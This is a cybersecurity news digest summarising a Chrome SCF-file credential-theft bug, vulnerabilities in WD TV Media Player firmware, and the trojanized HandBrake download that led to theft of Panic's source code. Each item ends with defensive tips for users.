- Google Chrome Bug Leads to Windows Credential Theft
A bug in Google’s popular web browser Chrome could enable bad actors to place a malicious file onto a target PC that could then be used to siphon off Windows credentials and initiate a Server Message Block (SMB) relay attack, according to a post by Bosko Stankovic, an information security engineer at DefenseCode. He discovered the vulnerability in the default configuration of Chrome and all Windows versions supporting the browser. With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location. It is happening due to Windows Explorer Shell Command File or SCF (.scf) a text file that launches commands requires no user action and can be used to trick Windows into an authentication attempt to a remote SMB server, which then gathers victims’ usernames and Microsoft LAN Manager (NTLMv2) password hash.
Cyber Security Tips: Users are strongly recommended to disable automatic downloads in Google Chrome; settings -> Show advanced settings -> Check the Ask where to save each file before downloading option.
- Researchers Disclose Unpatched WD TV Media Player Flaws
WD TV Media Player is a device that you can connect to a smart TV and play content stored on a local network storage (NAS) device, USB thumb drive, a local PC, or stream content on the Internet. Security researchers from SEC Consult have found eight vulnerabilities in the firmware of Western Digital TV Media Player that allow hackers a multitude of ways to hack and take over the device. The vulnerabilities are Unauthenticated Arbitrary File Upload, Local File Inclusion (LFI), Cross Site Request Forgery (CSRF), Private Key Embedded in Firmware, SQL Injection on SQLite Database, Webserver Running with Root Privileges, Login not protected against brute-force attacks and Full Path Disclosure. According to researcher these vulnerabilities range from SQL injections to CSRF bugs and allow attackers to upload rogue (backdoored) files on the device’s built-in web server, execute code against the device’s firmware, compromise its local SQLite database, and decrypt and steal a user data.
Cyber Security Tips: Company is still working on the issue, temporary mitigation for users to take these devices offline until a firmware version becomes available.
- Code Stolen After Developer Installed Trojanized App
In a perfect example of how a breach could have an unexpected impact, application builder Panic on Wednesday announced that it experienced source code theft after a developer unknowingly installed a Trojanized application in early May. A handbrake is a tool for converting video from nearly any format to a selection of modern, widely supported codecs. Panic Inc. developer and co-founder Steven Frank said he downloaded the infected version of HandBrake, which led to the theft of much of the source code behind Panic’s apps. Panic offers several apps, including web editor Coda, FTP app Transmit, SSH client Prompt, and Firewatch, an adventure game. Hackers accessed Frank’s computer through the infected HandBrake software and were able to obtain his usernames and passwords, including git credentials. HandBrake posted a security alert on its website, informing users that those who downloaded the application between May 2 and May 6 might have been infected. Only the download mirror at download.handbrake.fr had been compromised, but all users were advised to verify their installation.
Cyber Security Tips: Users who have installed application between May 2 and May 6 are recommended to verify their application or uninstalled, install the application through only trusted sources and keep installing reputed and updated antivirus.